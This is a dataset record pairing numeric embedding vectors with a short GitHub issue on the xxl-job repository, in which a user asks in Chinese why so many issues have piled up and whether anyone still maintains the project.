-0.003793278243392706, -0.00717935711145401, 0.0009315176284871995, -0.009472323581576347, 0.015560545027256012, -0.023293377831578255, 0.006119848694652319, 0.007883060723543167, 0.02403661422431469, 0.010460671037435532, 0.008563043549656868, -0.0025163330137729645, 0.003959320485591888, -0.0018679769709706306, 0.00609612837433815, -0.01543403696268797, -0.004471284803003073, 0.010136493481695652, 0.02035205438733101, -0.00472034839913249, -0.005281729623675346, -0.02952392026782036, 0.008365374058485031, -0.020336240530014038, 0.001188982161693275, 0.005633581429719925, 0.017790257930755615, -0.005198708735406399, 0.007377026602625847, 0.00630961125716567, 0.022629207000136375, -0.019308358430862427, -0.00817561149597168, 0.00538847129791975, 0.013030375353991985, -0.030425293371081352, -0.009124425239861012, -0.0009359652176499367, -0.00810445100069046, -0.007388886995613575, 0.007673530839383602, 0.0019509982084855437, 0.009148146025836468, -0.0056849755346775055, 0.016287969425320625, -0.0066772764548659325, 0.0014281623298302293, -0.01769537664949894, -0.0077051580883562565, 0.003222013358026743, 0.027626292780041695, 0.01444568857550621, 0.009741154499351978, 0.013085722923278809, 0.015378689393401146, 0.00009809350012801588, -0.017300037667155266, 0.01418476551771164, -0.01253224816173315, -0.004202453885227442, 0.007203077431768179, 0.010302535258233547, 0.00009043380850926042, 0.010444858111441135, 0.03289220854640007, 0.003660839516669512, 0.008238865993916988, -0.01584518887102604, 0.006930293515324593, -0.0042657083831727505, -0.0038842062931507826, -0.017948392778635025, 0.025744479149580002, -0.0034770069178193808, -0.00492197135463357, -0.009559297934174538, -0.0036549095530062914, 0.005546607077121735, 0.015378689393401146, 0.0021723881363868713, -0.02068413980305195, 0.005380564369261265, -0.00910070538520813, -0.03811068460345268, 0.002470869105309248, 0.0001627067249501124, -0.0020814600866287947, -0.0005327193648554385, 0.02854347974061966, 0.010009984485805035, 0.0067128571681678295, -0.012508527375757694, -0.0009764874703250825, -0.01025509461760521, -0.009203492663800716, 0.00717935711145401, -0.007147729862481356, 0.015331248752772808, -0.00459383986890316, 0.00884768832474947, 0.006776111200451851, -0.0006251298473216593, 0.016983766108751297, -0.0041510602459311485, 0.006922386586666107, -0.021443190053105354, 0.015196832828223705, 0.01652517169713974, -0.004321055952459574, -0.037161871790885925, 0.014081977307796478, -0.014327087439596653, -0.015386596322059631, -0.008689552545547485, -0.013900120742619038, -0.0038585092406719923, -0.005131500773131847, -0.006867039483040571, -0.006068454589694738, -0.01035788282752037, 0.007337492890655994, -0.03387264907360077, 0.0007269296911545098, 0.008223052136600018, -0.05057177320122719, 0.015410316176712513, 0.0024095915723592043, 0.006337285041809082, -0.0036173523403704166, 0.008610484190285206, -0.00593008566647768, -0.007626090198755264, 0.006878899410367012, 0.021648766472935677, 0.011053679510951042, -0.008045149967074394, -0.03205408900976181, -0.004925924353301525, -0.009314187802374363, 0.0327657014131546, 0.03728837892413139, 0.014303366653621197, 0.003390032332390547, -0.013069909065961838, 0.015694960951805115, 0.007618183735758066, 0.011962959542870522, -0.005700788926333189, 0.013315019197762012, 0.028622547164559364, 0.01261922251433134, -0.007910734042525291, -0.007954222150146961, 0.010871823877096176, -0.009954636916518211, 0.029856005683541298, 0.0020873902831226587, -0.0008376245968975127, 0.0003748308517970145, -0.017236782237887383, 0.015995418652892113, 0.0046333735808730125, -0.030931327491998672, -0.00884768832474947, -0.023783598095178604, 0.014904282055795193, 0.01921347714960575, -0.00450291158631444, 0.013251764699816704, 0.010065332055091858, -0.0012907820055261254, -0.023182682693004608, 0.023498952388763428, -0.007606323342770338, -0.0003254134499002248, -0.013939655385911465, -0.013283392414450645, 0.005376610904932022, -0.00275748991407454, 0.009630459360778332, -0.03070993721485138, -0.010136493481695652, 0.004874530714005232, 0.0008875361527316272, -0.029096953570842743, 0.009163958951830864, -0.00446733133867383, -0.0008588740602135658, 0.01119600236415863, -0.027847683057188988, -0.010215560905635357, -0.025285886600613594, -0.004605699796229601, 0.004751975182443857, 0.018264664337038994, 0.0019618701189756393, 0.022581767290830612, -0.005771950352936983, -0.013971282169222832, -0.007392840459942818, -0.007365166675299406, -0.017932578921318054, -0.021316681057214737, -0.004815229680389166, 0.026471903547644615, -0.011875985190272331, -0.011654594913125038, -0.04193756729364395, -0.004234081134200096, 0.005538700148463249, -0.01094298530369997, 0.0011968889739364386, -0.02890719100832939, -0.01888139359652996, -0.006198916118592024, 0.006878899410367012, -0.016042858362197876, -0.01685725711286068, 0.01703120581805706, -0.0030737612396478653, 0.009725340642035007, 0.02205991931259632, -0.004661047365516424, -0.02137993648648262, -0.004862670321017504, 0.007768412586301565, -0.020810646936297417, -0.00472034839913249, -0.03305034339427948, -0.024779852479696274, 0.007807946298271418, -0.021917596459388733, -0.022091547027230263, -0.012326671741902828, 0.028005817905068398, -0.0235147662460804, -0.0055347466841340065, -0.013828960247337818, 0.019466495141386986, -0.013338739983737469, 0.01889720745384693, -0.006357051897794008, 0.020494377240538597, 0.002848417963832617, -0.00339991576038301, -0.01596379093825817, 0.009638366289436817, -0.004886390641331673, 0.0017454219050705433, 0.010176027193665504, 0.005186848342418671, -0.005028712563216686, -0.028116513043642044, 0.011409484781324863, 0.010278815403580666, -0.008523509837687016, 0.0017760606715455651, 0.01253224816173315, -0.01609029993414879, -0.011709942482411861, 0.008037243038415909, 0.0035145641304552555, -0.006147522479295731, 0.0006864074384793639, -0.008997917175292969, -0.004313149023801088, -0.024827292189002037, 0.0035382844507694244, 0.016129832714796066, 0.0015862979926168919, -0.021648766472935677, -0.0011761336354538798, -0.01717352867126465, -0.01000207755714655, 0.007392840459942818, -0.012761544436216354, 0.004103619139641523, -0.006906573195010424, -0.0029334158170968294, 0.018928833305835724, 0.007875153794884682, 0.014856841415166855, -0.010136493481695652, 0.02156969904899597, 0.003352475119754672, 0.008760713040828705, -0.011251349002122879, -0.012223883531987667, -0.012168535962700844, 0.010452764108777046, -0.008373280987143517, -0.010990425944328308, 0.0032635238021612167, -0.005036619491875172, 0.006681229919195175, 0.011496460065245628, -0.0034513098653405905, 0.00817561149597168, -0.02621888555586338, -0.018074901774525642, -0.003245733678340912, -0.014429875649511814, 0.02035205438733101, -0.007950268685817719, -0.008483976125717163, 0.017110273241996765, -0.007072615437209606, -0.020257173106074333, -0.007297958713024855, 0.005139407701790333, 0.024985428899526596, -0.004443611018359661, -0.0056493948213756084, 0.01226341724395752, -0.015038697980344296, 0.020494377240538597, 0.008531416766345501, 0.00717935711145401, -0.014050349593162537, -0.00296504283323884, 0.005906365346163511, -0.0038585092406719923, 0.011235536076128483, -0.026930496096611023, 0.027278395369648933, -0.01609029993414879, -0.00206959992647171, 0.0004459918709471822, 0.02906532771885395, 0.003803161671385169, 0.010697875171899796, 0.0028326043393462896, 0.007641904056072235, -0.0027990005910396576, 0.020336240530014038, -0.0020280892495065928, -0.006578441709280014, 0.0054082381539046764, -0.004949645139276981, -0.010595086961984634, -0.000774864514824003, 0.005578233860433102, -0.0019005924696102738, 0.00468081422150135, 0.00034345081076025963, -0.016746561974287033, 0.00683936569839716, 0.005001038778573275, 0.006301704328507185, 0.02137993648648262, -0.000052505969506455585, 0.02236037701368332, -0.010713688097894192, -0.005736369639635086, 0.002437265357002616, 0.006740530952811241, 0.003034227294847369, -0.0030559708829969168, -0.0197036974132061, -0.00017740839393809438, 0.006048687268048525, -0.0015704843681305647, 0.003048064187169075, -0.0007714053499512374, -0.009163958951830864, -0.009456509724259377, 0.014168951660394669, -0.014074070379137993, 0.005989386700093746, -0.0020478563383221626, -0.0017770490376278758, 0.00806096289306879, -0.019245104864239693, -0.0018422800349071622, 0.023498952388763428, -0.027120258659124374, 0.013789426535367966, -0.028622547164559364, -0.01654098555445671, 0.0322754792869091, 0.004953598137944937, -0.017632121220231056, -0.018327917903661728, -0.004119432996958494, 0.005467539187520742, -0.0008692517294548452, 0.0025400533340871334, -0.007859339937567711, 0.018106527626514435, 0.008005616255104542, -0.019102783873677254, 0.003239803481847048, -0.0058114840649068356, -0.0144377825781703, 0.004281521774828434, 0.024431953206658363, -0.035011228173971176, 0.010555552318692207, 0.0025222632102668285, -0.0043922169134020805, 0.0033801489043980837, -0.00040275166975334287, -0.015212646685540676, 0.0016070532146841288, 0.028163954615592957, -0.007966081611812115, 0.003508634166792035, -0.0072544715367257595, 0.017426544800400734, 0.014050349593162537, -0.013465248048305511, -0.013726172037422657, 0.013955468311905861, 0.009772781282663345, -0.000003953390660171863, -0.000018840377379092388, -0.0030500406865030527, 0.0035145641304552555, -0.017995834350585938, 0.019798580557107925, 0.0030105069745332003, 0.012121095322072506, -0.005882645025849342, 0.007147729862481356, -0.018312104046344757, 0.008705365471541882, -0.00020112874335609376, 0.006107988301664591, -0.00048824373516254127, -0.020114850252866745, -0.01293549407273531, 0.0028464412316679955, -0.0011939239921048284, -0.014081977307796478, 0.01801164634525776, 0.010405323468148708, -0.004222221206873655, -0.003332708263769746, 0.019577190279960632, 0.016967952251434326, 0.011630875058472157, -0.00446733133867383, 0.0019025692017748952, 0.012255510315299034, 0.010974612087011337, -0.00019297486869618297, 0.007377026602625847, -0.010982519015669823, -0.005989386700093746, -0.002974926261231303, -0.004708488006144762, -0.004605699796229601, -0.006590302102267742, 0.006432166323065758, 0.008784433826804161, -0.018913019448518753, 0.011828544549643993, 0.02756303921341896, -0.0033544518519192934, 0.02071576565504074, 0.0013500828063115478, 0.016185181215405464, 0.013409900479018688, -0.0020458796061575413, -0.008950476534664631, -0.00040917590376921, -0.013243857771158218, -0.009401163086295128, 0.012729917652904987, -0.014421968720853329, 0.015449849888682365, -0.013481061905622482, -0.010800662450492382, 0.005329170264303684, -0.004977318458259106, 0.03260756656527519, 0.001128692994825542, -0.0012542131589725614, 0.002470869105309248, 0.009132332168519497, 0.0043012890964746475, 0.012018307112157345, 0.010429044254124165, 0.012405739165842533, 0.0007570742745883763, -0.0020557630341500044, -0.012397832237184048, 0.0007422490743920207, 0.0009330001776106656, 0.0013016537996008992, 0.006459840107709169, 0.023166868835687637, -0.008879315108060837, -0.02017810568213463, 0.018944647163152695, 0.016161460429430008, 0.008879315108060837, 0.0166833084076643, -0.012927587144076824, -0.0035699116997420788, 0.007479814812541008, 0.00902163702994585, 0.015196832828223705, -0.0005450737080536783, -0.02188597060739994, -0.0014321156777441502, -0.01919766515493393, 0.004613606724888086, -0.0014301390619948506, -0.012310857884585857, -0.004977318458259106, 0.007970035076141357, -0.00509987398982048, -0.006100081373006105, 0.004981271922588348, -0.013662917539477348, 0.005159174557775259, 0.007744691800326109, 0.004945691674947739, -0.010602992959320545, 0.00750748859718442, -0.007207030896097422, 0.022755715996026993, 0.008436535485088825, -0.014785680919885635, 0.007147729862481356, -0.007946315221488476, 0.015362875536084175, 0.003983040805906057, -0.006155428942292929, 0.00405222550034523, -0.003696420229971409, 0.0039019964169710875, -0.009464416652917862, 0.01261922251433134, 0.023261750116944313, -0.0024431953206658363, 0.025444021448493004, 0.010239281691610813, 0.005119640845805407, 0.00012712621537502855, 0.015117765404284, -0.0008139042765833437, -0.021806901320815086, 0.00533707719296217, -0.0022692461498081684, 0.006048687268048525, -0.007970035076141357, 0.009725340642035007, -0.014279646798968315, 0.009132332168519497, 0.016936324536800385, -0.002654701704159379, 0.010658340528607368, -0.008831874467432499, -0.004518725443631411, 0.0077960859052836895, 0.016272155568003654, 0.015710774809122086, 0.0058945054188370705, -0.010516018606722355, -0.01501497719436884, -0.004364543128758669, 0.007879107259213924, 0.023293377831578255, -0.009124425239861012, 0.0027357463259249926, -0.011243443004786968, 0.009543485008180141, -0.013473154976963997, 0.0038249052595347166, 0.013062002137303352, -0.00783562008291483, -0.033809397369623184, -0.0190237145870924, -0.0009211400174535811, 0.014904282055795193, 0.00028489119722507894, 0.028448598459362984, -0.011828544549643993, 0.008950476534664631, 0.015196832828223705, -0.008784433826804161, 0.008491883054375648, -0.0026230746880173683, 0.007602369878441095, 0.004732208326458931, -0.019292546436190605, 0.002026112750172615, -0.003034227294847369, -0.01687307097017765, 0.00985184870660305, 0.005736369639635086, 0.020668325945734978, 0.012579688802361488, 0.023593833670020103, 0.01704701967537403, -0.014406154863536358, 0.00263098138384521, -0.00944069679826498, 0.002488659229129553, -0.003643049392849207, 0.010239281691610813, 0.005250102374702692, 0.005277776159346104, -0.01510195154696703, 0.007416560780256987, 0.023910105228424072, 0.012666663154959679, 0.009662086144089699, 0.016794003546237946, -0.01101414579898119, 0.004178733564913273, 0.018406985327601433, 0.004661047365516424, 0.022961292415857315, 0.012793172150850296, -0.016730748116970062, -0.004384309984743595, -0.04060922563076019, -0.008657924830913544, 0.0187232568860054, -0.015109858475625515, -0.010579273104667664, -0.004155013244599104, -0.022898036986589432, -0.0013540362706407905, 0.006787971593439579, -0.021901782602071762, -0.0017938509117811918, 0.009195586666464806, 0.0006448968197219074, -0.014967536553740501, 0.013805239461362362, -0.010326256044209003, -0.007582603022456169, -0.018233036622405052, -0.029460666701197624, 0.006333331577479839, -0.0020478563383221626, -0.0060447342693805695, -0.0034275895450264215, -0.01900790072977543, 0.01427173987030983, 0.011061586439609528, 0.004925924353301525, 0.009836035780608654, 0.011543900705873966, -0.016011232510209084, 0.00738098006695509, 0.00041337640141136944, -0.004162920173257589, 0.01737910509109497, -0.011978773400187492, 0.01128297671675682, 0.01352850254625082, -0.0072781918570399284, 0.011022052727639675, 0.011986680328845978, -0.03039366565644741, -0.0006019037100486457, -0.00006467499770224094, -0.004613606724888086, 0.001015032990835607, -0.015505197457969189, -0.03020390309393406, -0.0044159372337162495, 0.003508634166792035, 0.010547646321356297, 0.010484391823410988, -0.004103619139641523, -0.0051077804528176785, -0.01720515638589859, -0.0025420300662517548, -0.002761443378403783, -0.006776111200451851, -0.010009984485805035, -0.007689344696700573, 0.009978357702493668, -0.006768204737454653, 0.015133579261600971, -0.002727839397266507, -0.0020518095698207617, -0.010650433599948883, 0.03257593885064125, -0.0015685076359659433, 0.0029571361374109983, -0.013243857771158218, -0.010571366176009178, 0.01110112015157938, -0.01769537664949894, -0.001095089130103588, 0.011789010837674141, -0.0071398233994841576, -0.008555136620998383, -0.024985428899526596, -0.01285642571747303, 0.0038683926686644554, 0.0072781918570399284, 0.0018037344561889768, -0.01469870563596487, -0.012571781873703003, 0.013386180624365807, 0.01376570574939251, 0.014572197571396828, 0.026345394551753998, 0.006697043310850859, -0.006218683440238237, 0.005736369639635086, 0.00976487435400486, -0.005202661734074354, 0.005111733917146921, 0.006147522479295731, -0.02020973153412342, 0.0071951705031096935, -0.0012512480607256293, 0.007724924944341183, 0.008926755748689175, -0.008895128965377808, 0.007748645264655352, 0.011472739279270172, -0.009314187802374363, -0.0026033075992017984, 0.008412814699113369, 0.01152017991989851, -0.0037418841384351254, 0.0033880556002259254, 0.006910526659339666, 0.011923425830900669, -0.017426544800400734, 0.019450681284070015, 0.020668325945734978, -0.00793840829282999, -0.004751975182443857, -0.0037201405502855778, 0.0008302120259031653, 0.002217852044850588, -0.009614645503461361, 0.005044526420533657, 0.012492714449763298, -0.0032239898573607206, 0.008634204976260662, 0.004759882111102343, 0.004744068719446659, -0.008990010246634483, -0.008207238279283047, -0.003662816248834133, 0.027910936623811722, 0.014841027557849884, 0.016620052978396416, 0.014097790233790874, 0.01025509461760521, -0.009804408065974712, 0.006807738449424505, 0.012808985076844692, -0.01528380811214447, -0.009907196275889874, -0.013552222400903702, -0.007768412586301565, 0.0004973859176971018, 0.007997709326446056, -0.008045149967074394, -0.012476900592446327, 0.001572461100295186, 0.00039657449815422297, -0.010168120265007019, -0.02286641113460064, 0.01752142608165741, 0.020415307953953743, 0.016904698684811592, 0.015600078739225864, 0.009211399592459202, -0.024147309362888336, 0.001559612574055791, 0.007649810519069433, 0.020146477967500687, -0.010824383236467838, -0.010278815403580666, -0.010191841050982475, 0.021459003910422325, 0.0018076878041028976, -0.010318349115550518, -0.013148976489901543, -0.01903952844440937, 0.025633784011006355, 0.0016268201870843768, 0.005052432883530855, 0.008092590607702732, -0.0034651467576622963, -0.006013107020407915, 0.012310857884585857, 0.02422637678682804, 0.007732831872999668, 0.016446104273200035, 0.007317726034671068, 0.0052580093033611774, -0.008270492777228355, -0.0027634198777377605, 0.012698289938271046, -0.003305034479126334, 0.015726586803793907, -0.0034256128128618, 0.0044831447303295135, -0.01635122299194336, -0.004712441470474005, 0.0007279180572368205, 0.018928833305835724, -0.005526839755475521, 0.01921347714960575, -0.023404071107506752, 0.008302120491862297, 0.00009179278276860714, 0.002597377635538578, -0.03494797274470329, -0.027974192053079605, -0.009978357702493668, -0.020668325945734978, -0.0014429875882342458, 0.003933623433113098, -0.013710358180105686, -0.007926547899842262, -0.020415307953953743, -0.019814392551779747, 0.012065747752785683, -0.009140239097177982, 0.005273823160678148, 0.009456509724259377, 0.014263832941651344, 0.02836953103542328, 0.0007308830972760916, -0.012334578670561314, -0.0018491983646526933, 0.005467539187520742, -0.011931332759559155, 0.006250310223549604, -0.01636703684926033, -0.0093616284430027, 0.020731579512357712, 0.007317726034671068, -0.006697043310850859, 0.03070993721485138, 0.00806096289306879, -0.0038782760966569185, 0.00227715284563601, -0.014469409361481667, 0.003216083161532879, 0.019814392551779747, 0.00825467985123396, -0.004230127669870853, 0.0002579587453510612, -0.004317102488130331, -0.007748645264655352, -0.006388679146766663, 0.006681229919195175, 0.02169620804488659, -0.015378689393401146, 0.03104202263057232, 0.01461173128336668, -0.00034518042230047286, -0.012777358293533325, 0.013465248048305511, -0.021000409498810768, -0.019071156159043312, 0.012302950955927372, 0.011955052614212036, -0.007080522365868092, 0.021490631625056267, -0.005669162143021822, 0.0008475080830976367, 0.0021209940314292908, 0.0183437317609787, -0.0028009770903736353, 0.008037243038415909, 0.01635122299194336, -0.015900537371635437, -0.0008040207903832197, -0.011765290051698685, 0.02607656456530094, -0.005688928999006748, 0.0022890130057930946, -0.0152679942548275, -0.002017217455431819, 0.01900790072977543, 0.05696045234799385, -0.003469100221991539, 0.005163128022104502, -0.008507695980370045, 0.012453179806470871, -0.026614224538207054, -0.029334157705307007, 0.012144816108047962, -0.00412733992561698, 0.029950886964797974, 0.009535578079521656, -0.00555056007578969, -0.013046188279986382, 0.00022954372980166227, 0.009227213449776173, -0.009559297934174538, 0.028606733307242393, -0.004704534541815519, -0.009045357815921307, -0.002383894519880414, 0.00884768832474947, -0.013639197684824467, -0.0014360691420733929, -0.0006542861228808761, -0.008744900114834309, -0.009282561019062996, -0.005428005009889603, -0.009148146025836468, -0.013212230987846851, 0.008570950478315353, 0.0009112565312534571, 0.007724924944341183, -0.023119427263736725, -0.02205991931259632, 0.0019322196021676064, -0.015750307589769363, -0.012848518788814545, 0.010642527602612972, 0.0020053572952747345, 0.005704742390662432, -0.030109021812677383, -0.01835954561829567, -0.017315849661827087, 0.0022791295778006315, 0.011425298638641834, -0.011037866584956646, -0.02572866529226303, -0.01580565609037876, -0.027183514088392258, -0.00826258584856987, 0.01587681658565998, 0.01837535947561264, -0.014350807294249535, 0.0005262951017357409, 0.008792340755462646, 0.007618183735758066, -0.011061586439609528, 0.00462942011654377, 0.025807732716202736, 0.0011227629147469997, 0.03289220854640007, 0.0034374729730188847, -0.0010466601233929396, 0.0034987505059689283, -0.002723886165767908, 0.002961089601740241, -0.005530793219804764, -0.0022613394539803267, 0.0011593317613005638, 0.0029136487282812595, -0.002723886165767908, -0.020099038258194923, 0.01669912226498127, 0.0037280472461134195, -0.0038703694008290768, 0.004404076840728521, 0.0005836192867718637, -0.0015774028142914176, -0.007384933531284332, 0.015125672332942486, 0.0065270476043224335, -0.007578649558126926, 0.01052392553538084, 0.008096544072031975, 0.02071576565504074, 0.0062858909368515015, -0.030488546937704086, 0.02119017392396927, -0.008389094844460487, 0.023751970380544662, -0.014485223218798637, -0.012872239574790001, -0.031184343621134758, -0.007970035076141357, 0.011464832350611687, -0.004238034598529339, -0.02035205438733101, -0.004961505066603422, 0.00817561149597168, -0.029460666701197624, 0.027246767655014992, -0.0007056802278384566, 0.005874738097190857, 0.0035204943269491196, -0.012144816108047962, 0.025776106864213943, 0.004661047365516424, -0.000645885185804218, 0.038458582013845444, -0.02307198755443096, 0.0144377825781703, -0.002781210234388709, -0.0008104450535029173, 0.007286098785698414, 0.0007170462049543858, -0.02205991931259632, -0.015766121447086334, -0.04880065098404884, 0.001886755577288568, 0.0013688614126294851, 0.015394502319395542, 0.01610611379146576, 0.025301698595285416, -0.017363291233778, 0.00859467126429081, -0.017568867653608322, 0.026266327127814293, 0.007175403647124767, 0.00526196276769042, -0.02337244525551796, 0.00043289625318720937, 0.013322926126420498, -0.0006691113230772316, -0.02071576565504074, 0.0571502149105072, 0.008634204976260662, 0.019086970016360283, 0.005012899171561003, 0.0032437569461762905, 0.02373615652322769, -0.007159590255469084, -0.01687307097017765, -0.004131292924284935, 0.02187015675008297, 0.0005332135478965938, -0.004103619139641523, 0.011789010837674141, -0.012326671741902828, 0.002998646814376116, -0.0013540362706407905, -0.012816892005503178, -0.004360589664429426, -0.019324172288179398, -0.005902411881834269, -0.011583434417843819, -0.007068662438541651, 0.03167456388473511, -0.018913019448518753, -0.011931332759559155, 0.021474817767739296, 0.012421553023159504, 0.009883476421236992, 0.007100289221853018, 0.015196832828223705, 0.025143563747406006, -0.007602369878441095, -0.007602369878441095, 0.009804408065974712, 0.008057009428739548, 0.020114850252866745, 0.007918640971183777, 0.012761544436216354, -0.022123172879219055, -0.011156467720866203, 0.0037339774426072836, 0.005613814573734999, 0.005341030657291412, 0.011188095435500145, 0.00413919985294342, -0.011022052727639675, 0.015347061678767204, 0.011828544549643993, 0.013844773173332214, -0.0009923010366037488, 0.014516850002110004, 0.018754884600639343, 0.0022218055091798306, -0.010974612087011337, 0.0013817099388688803, -0.0011959006078541279, -0.005546607077121735, -0.009377442300319672, -0.006629835814237595, -0.0029729497618973255, -0.004744068719446659, -0.020446935668587685, -0.020494377240538597, 0.006894713267683983, -0.023340817540884018, 0.0007674519438296556, 0.02150644361972809, 0.026503529399633408, -0.021142732352018356, -0.0015003116568550467, 0.008499789983034134, 0.0019440797623246908, 0.019118595868349075, 0.0052342889830470085, -0.016746561974287033, -0.0288755651563406, 0.013141070492565632, 0.013141070492565632, -0.010160213336348534, 0.010705781169235706, -0.010903450660407543, -0.012642943300306797, -0.005542653612792492, -0.011156467720866203, -0.0010076203616335988, -0.015078231692314148, -0.01752142608165741, -0.007080522365868092, 0.00605659419670701, 0.02039949595928192, -0.00927465409040451, 0.02171202003955841, -0.02772117406129837, 0.006661463063210249, -0.001182063715532422, 0.0003874322574120015, -0.007448187563568354, -0.003048064187169075, 0.010207653976976871, 0.009464416652917862, -0.008531416766345501, 0.020826460793614388, -0.018454426899552345, 0.010682061314582825, 0.0040917592123150826, -0.009519764222204685, -0.010176027193665504, -0.009084891527891159, 0.00045735787716694176, 0.0023483140394091606, 0.007511442061513662, 0.01518892589956522, -0.01367873139679432, 0.001635715365409851, 0.0062028695829212666, -0.007527255453169346, 0.0068512256257236, 0.022803155705332756, 0.00768539123237133, -0.005238242447376251, -0.012468993663787842, -0.010753221809864044, 0.034979600459337234, 0.02670910581946373, 0.008744900114834309, -0.0058352043852210045, 0.008230959065258503, 0.04105200618505478, 0.007207030896097422, 0.017980020493268967, 0.000017697599105304107, -0.02623469941318035, 0.011156467720866203, 0.010207653976976871, 0.020668325945734978, 0.01461173128336668, -0.014896375127136707, 0.0024767990689724684, 0.012690383940935135, 0.01956137642264366, 0.0025993543677031994, 0.059870146214962006, 0.002219828777015209, 0.017948392778635025, -0.013101535849273205, 0.0054082381539046764, -0.005238242447376251, -0.0038308354560285807, 0.010990425944328308, -0.034979600459337234, 0.010753221809864044, 0.01327548548579216, 0.007843527011573315, -0.0068512256257236, -0.0009048322681337595, 0.0004622995911631733, 0.00717935711145401, 0.015022884123027325, -0.013465248048305511, -0.0013372343964874744, -0.0250644963234663, 0.004574073012918234, 0.0017454219050705433, 0.014912188984453678, 0.0025795872788876295, 0.005004992242902517, -0.0007798062870278955, -0.0079739885404706, 0.013813146390020847, 0.010666247457265854, -0.020794834941625595, -0.0043250094167888165, -0.009733247570693493, -0.005020806100219488, 0.03757302463054657, -0.000004466868176677963, 0.013267578557133675, -0.009416976012289524, 0.02455846220254898, 0.008610484190285206, 0.007519348990172148, -0.008997917175292969, 0.002577610546723008, -0.000032584586733719334, 0.027816055342555046, -0.0019579166546463966, -0.014746146276593208, -0.020114850252866745, 0.020573444664478302, 0.0023898244835436344, 0.007199123967438936, -0.02588680200278759, 0.0183437317609787, -0.009812314994633198, -0.011599247343838215, 0.010966705158352852, 0.02569703757762909, -0.010073238983750343, 0.008207238279283047, -0.016256341710686684, 0.005977526307106018, -0.013575943186879158, -0.025791918858885765, 0.006815645378082991 ]
null
null
null
null
null
null
null
null
null
[ "xuxueli", "xxl-job" ]
这个项目的Issues怎么堆积这么多,还有人管么,哈哈
一点小疑问
https://api.github.com/repos/xuxueli/xxl-job/issues/3428/comments
1
2024-04-19T16:30:50
2024-05-22T03:12:40Z
https://github.com/xuxueli/xxl-job/issues/3428
2,253,419,695
3,428
false
This is a GitHub Issue repo:xxl-job owner:xuxueli Title : 一点小疑问 Issue date: --- start body --- 这个项目的Issues怎么堆积这么多,还有人管么,哈哈 --- end body ---
141
[ -0.017436321824789047, 0.06435954570770264, -0.010014103725552559, 0.001299098483286798, 0.052645571529865265, -0.014945418573915958, -0.004306485410779715, 0.04692322760820389, 0.00653441296890378, -0.0032167150638997555, -0.015298857353627682, -0.0364883616566658, -0.004371703136712313, 0.037329886108636856, 0.008474119007587433, 0.04651929810643196, 0.007859809324145317, 0.03399746119976044, 0.014634055085480213, -0.03658934682607651, -0.005049127619713545, -0.0023941281251609325, 0.0129173519089818, 0.0576946996152401, 0.004279135726392269, -0.0014158595586195588, 0.004514761734753847, 0.007880846969783306, -0.042345352470874786, 0.007190799340605736, -0.0010792510583996773, 0.021913213655352592, 0.01558497454971075, -0.036723989993333817, 0.04635099321603775, -0.006778453942388296, 0.06112810596823692, 0.015904752537608147, -0.01619928516447544, -0.015904752537608147, 0.0015936309937387705, -0.033644020557403564, -0.04342249780893326, 0.0010398047743365169, 0.004043509718030691, 0.006892059464007616, -0.013085655868053436, 0.026962341740727425, -0.0036080225836485624, 0.0243031345307827, 0.035949788987636566, -0.02995815873146057, 0.015189459547400475, -0.03453603386878967, -0.020718254148960114, -0.03361035883426666, 0.03992177173495293, -0.04332151636481285, -0.018277842551469803, -0.011419444344937801, -0.01871543377637863, 0.00018723848916124552, -0.004258097615092993, 0.012395608238875866, 0.007683089468628168, 0.05348709225654602, -0.024050679057836533, 0.042345352470874786, 0.024118000641465187, 0.04288392513990402, 0.017991725355386734, 0.02689502015709877, 0.013489586301147938, 0.021340979263186455, 0.015542898327112198, -0.020718254148960114, 0.004561045207083225, -0.007582106627523899, -0.015181044116616249, 0.018479807302355766, -0.03164120018482208, 0.019085703417658806, -0.022384466603398323, -0.04419669881463051, 0.027534576132893562, 0.030109630897641182, -0.04069596901535988, -0.0850946307182312, 0.012799538671970367, 0.019186684861779213, -0.016140379011631012, 0.019321328029036522, -0.011150157079100609, -0.05941140279173851, 0.0637536495923996, -0.024892199784517288, 0.003647994715720415, 0.017688777297735214, -0.029436415061354637, -0.05846890062093735, 0.013615814037621021, 0.02825828455388546, -0.025716891512274742, -0.03292031213641167, 0.019944055005908012, -0.0005159577704034746, 0.015366178937256336, -0.026861360296607018, 0.010670489631593227, 0.04315321147441864, 0.010880870744585991, 0.00832685362547636, -0.07109171897172928, -0.015021154657006264, -0.04725983738899231, 0.0667831301689148, -0.007796694990247488, -0.05816595256328583, -0.002993711968883872, -0.011234309524297714, 0.041234541684389114, -0.018294673413038254, -0.022418126463890076, -0.04375910758972168, -0.028796859085559845, 0.034738000482320786, 0.01930449903011322, -0.004674650728702545, 0.014709792099893093, 0.005259508267045021, -0.04948145151138306, 0.0026003008242696524, -0.02763555943965912, -0.05459790304303169, 0.02080240659415722, 0.008726575411856174, 0.03292031213641167, 0.03292031213641167, -0.03202829882502556, -0.016645291820168495, -0.0623062364757061, -0.04584607854485512, -0.0037952610291540623, -0.016434911638498306, -0.02004503645002842, 0.006711132358759642, -0.029049314558506012, -0.0013443302595987916, -0.034704338759183884, 0.0333915650844574, -0.018580790609121323, -0.025195147842168808, 0.006071575917303562, 0.05833425745368004, 0.03675765171647072, -0.04069596901535988, -0.0006185181555338204, 0.010308635421097279, 0.01662004552781582, -0.03391330689191818, 0.007716750260442495, -0.012059000320732594, 0.04359080269932747, 0.02612082101404667, -0.028359267860651016, -0.01916985586285591, 0.015593389980494976, 0.018294673413038254, -0.06405659765005112, 0.029823513701558113, -0.0189678892493248, 0.010165576823055744, 0.0011181713780388236, -0.0026024046819657087, -0.00687102135270834, -0.03313910961151123, 0.03817140683531761, 0.03695961460471153, -0.008217455819249153, -0.007380141876637936, 0.008364721201360226, 0.042143385857343674, 0.045509472489356995, 0.019641106948256493, 0.007624182850122452, -0.01837882585823536, 0.022754736244678497, -0.03574782609939575, -0.004264409188181162, -0.010569507256150246, 0.0025771588552743196, 0.0019007861847057939, 0.04241267219185829, -0.04786572977900505, 0.018934229388833046, -0.0395178385078907, -0.019540123641490936, -0.023949695751070976, 0.02418532222509384, -0.0410662405192852, -0.009475530125200748, 0.001515790238045156, -0.04177311807870865, -0.028342436999082565, -0.01146151963621378, 0.01359056867659092, -0.01002251822501421, -0.006378731224685907, 0.021391471847891808, -0.039753466844558716, 0.000941451929975301, -0.002381505211815238, -0.00022037338931113482, 0.004792463965713978, -0.008928541094064713, 0.007363311480730772, 0.02888101153075695, -0.00630720192566514, 0.01805904693901539, -0.0364547036588192, 0.04453330859541893, -0.034098442643880844, 0.03524291142821312, -0.022132009267807007, -0.04584607854485512, -0.01930449903011322, -0.017570964992046356, 0.0243367962539196, 